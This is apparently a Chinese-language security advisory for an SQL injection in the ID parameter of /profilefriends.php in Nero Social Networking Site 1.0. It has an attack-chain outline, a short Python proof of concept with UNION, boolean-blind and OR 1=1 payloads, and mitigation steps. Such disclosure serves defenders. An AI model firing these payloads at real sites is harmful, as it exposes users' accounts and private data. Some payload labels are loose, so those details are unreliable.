CVE-2025-13279: Nero Social Networking Site 1.0 /profilefriends.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13279

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nero Social Networking Site 1.0

漏洞概述

CVE-2025-13279是code-projects公司开发的Nero Social Networking Site 1.0社交网络系统中存在的SQL注入漏洞。该漏洞位于/profilefriends.php文件的ID参数处理逻辑中，由于未对用户输入进行充分的参数化查询或输入过滤，攻击者可以通过构造恶意的SQL语句片段实现数据库注入攻击。成功利用此漏洞的低权限攻击者可以远程执行SQL查询，获取数据库中的敏感信息，包括用户账户数据、私人消息、社交关系等机密信息。漏洞的CVSS评分为6.3，属于中等严重程度，攻击复杂度低，无需用户交互即可发起攻击。由于该漏洞的利用代码已被公开披露，潜在攻击者可以轻易获取并使用，对未修复的系统构成严重威胁。建议受影响用户尽快采取修复措施，防止敏感数据泄露和可能的进一步系统入侵。

技术细节

该SQL注入漏洞源于/profilefriends.php文件中对ID参数的直接使用。当用户请求该页面并传递ID参数时，应用程序直接将用户输入拼接到SQL查询语句中，而未进行任何输入验证或使用参数化查询。攻击者可以通过在ID参数中注入SQL语句来实现数据库操作。典型的注入Payload可能包括：使用UNION SELECT语句获取其他表的数据、使用布尔型盲注推断数据库信息、或使用时间型盲注进行数据提取。由于该漏洞属于基于错误的SQL注入，攻击者可以通过观察不同的Payload导致的页面响应差异（如错误消息内容或页面显示变化）来逐步提取数据库中的敏感信息。漏洞的影响范围涵盖整个数据库，包括用户表中的用户名、密码哈希、邮箱地址等敏感信息。攻击者还可能利用注入点执行数据库管理操作，导致数据篡改或服务中断。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Nero Social Networking Site 1.0系统，并定位到存在SQL注入漏洞的/profilefriends.php页面

STEP 2

步骤2: 漏洞探测

攻击者使用SQL注入测试Payload（如单引号、UNION语句等）探测ID参数是否存在SQL注入漏洞，观察页面响应差异

STEP 3

步骤3: 数据提取

通过UNION注入或盲注技术逐步提取数据库中的敏感信息，包括用户表结构、账户凭据、社交关系数据等

STEP 4

步骤4: 权限提升

利用获取的管理员凭据或其他敏感信息，尝试登录后台管理系统或进行进一步的横向移动攻击

STEP 5

步骤5: 数据窃取或破坏

完成数据窃取或利用注入点执行恶意数据库操作，可能导致数据篡改、服务中断或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13279 SQL Injection PoC
# Target: Nero Social Networking Site 1.0
# Vulnerable Endpoint: /profilefriends.php?ID=

def exploit_sqli(target_url, payload):
    """Send SQL injection payload to vulnerable endpoint"""
    target = f"{target_url}/profilefriends.php?ID={payload}"
    try:
        response = requests.get(target, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

# Basic authentication bypass payload
basic_payload = "' OR '1'='1"
# Union-based injection to extract database version
union_payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL---"
# Blind boolean injection to check if admin exists
blind_payload = "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13279.py <target_url>")
        print("Example: python cve-2025-13279.py http://localhost/nero")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] Testing basic injection on {target}")
    status, resp = exploit_sqli(target, basic_payload)
    if status:
        print(f"[*] Status: {status}")
        print(f"[*] Response length: {len(resp)}")

影响范围

Nero Social Networking Site 1.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 在Web应用层实现输入过滤，对ID参数进行严格的类型检查和正则验证；2) 部署WAF规则阻止常见的SQL注入攻击模式；3) 限制数据库账户权限，避免注入点执行高危操作；4) 启用数据库查询日志和异常检测，及时发现可疑的SQL注入行为；5) 考虑暂时禁用或限制/profilefriends.php页面的访问，待漏洞修复后再恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13279
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13279
3 Details https://www.cvedetails.com/cve/CVE-2025-13279/
4 VulDB https://vuldb.com/cve/CVE-2025-13279
5 Link https://code-projects.org/
6 Link https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005
7 Link https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005/blob/main/report.md
8 Link https://vuldb.com/?ctiid.332614
9 Link https://vuldb.com/?id.332614
10 Link https://vuldb.com/?submit.690963